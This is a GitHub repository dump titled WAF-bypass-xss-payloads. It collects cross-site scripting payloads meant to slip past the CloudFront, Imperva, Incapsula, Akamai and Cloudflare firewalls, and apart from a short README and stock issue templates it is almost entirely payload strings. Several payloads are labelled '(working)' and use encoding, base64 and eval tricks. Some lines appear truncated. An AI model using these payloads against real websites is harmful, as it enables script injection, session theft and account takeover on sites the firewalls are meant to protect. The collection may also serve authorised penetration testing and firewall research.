├── .github └── ISSUE_TEMPLATE │ ├── custom.md │ └── feature_request.md ├── README.md ├── cloudfront xss payloads ├── Imperva xss payloads ├── Incapsula xss payloads ├── akamai xss payloads └── Cloudflare xss payloads /.github/ISSUE_TEMPLATE/custom.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Custom issue template 3 | about: Describe this issue template's purpose here. 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WAF-bypass-xss-payloads 2 | 3 | Trying to gather xss payloads from the internet that bypasses WAF. All credit goes to the owners of the payloads. 4 | 5 | #Note: 6 | These payloads may not be a global bypass but working on specific endpoints. 7 | -------------------------------------------------------------------------------- /cloudfront xss payloads: -------------------------------------------------------------------------------- 1 | ">%0D%0A%0D%0A 2 | ">'>
3 | 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ 4 | "><img src=x onerror=confirm(1);> 5 | 6 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /Imperva xss payloads: -------------------------------------------------------------------------------- 1 | clickme (working)-Pinaki @0xInfection(Make sure to URL encode the payload properly) 2 | tarun">click (workin)Pinaki @0xInfection (Make sure the applications decodes the payload from encoded) 4 |
- @xsspayloads 5 | 6 | click Pinaki @0xInfection 7 | -@AldenAous 8 | -------------------------------------------------------------------------------- /Incapsula xss payloads: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | [1].map(alert) or (alert)(1) 8 | <">
XXXXX 9 | [1].find(confirm) 10 | 11 | %22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E 12 | '-[document.domain].map(alert)-' 13 | -------------------------------------------------------------------------------- /akamai xss payloads: -------------------------------------------------------------------------------- 1 |
2 | 3 | 4 | 5 | "%3balert`1`%3b" 6 | asd"`> onpointerenter=x=prompt,x`XSS` 7 | click 8 | click 9 | click 10 | click 11 | \"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+Click Here! 2 | Dec: 3 | Hex: 4 | xss'"> 10 | 11 | %2sscript%2ualert()%2s/script%2u 12 | 13 | 14 | 15 | “> 18 | (working) 19 | test",prompt%0A/*HelloWorld*/(document.domain) (working)- Brutelogic 20 | "onx+%00+onpointerenter%3dalert(domain)+x" (working)- Brutelogic 21 | "> (working)- IamRenganathan 22 | %27%09);%0d%0a%09%09[1].find(alert)// 23 | --------------------------------------------------------------------------------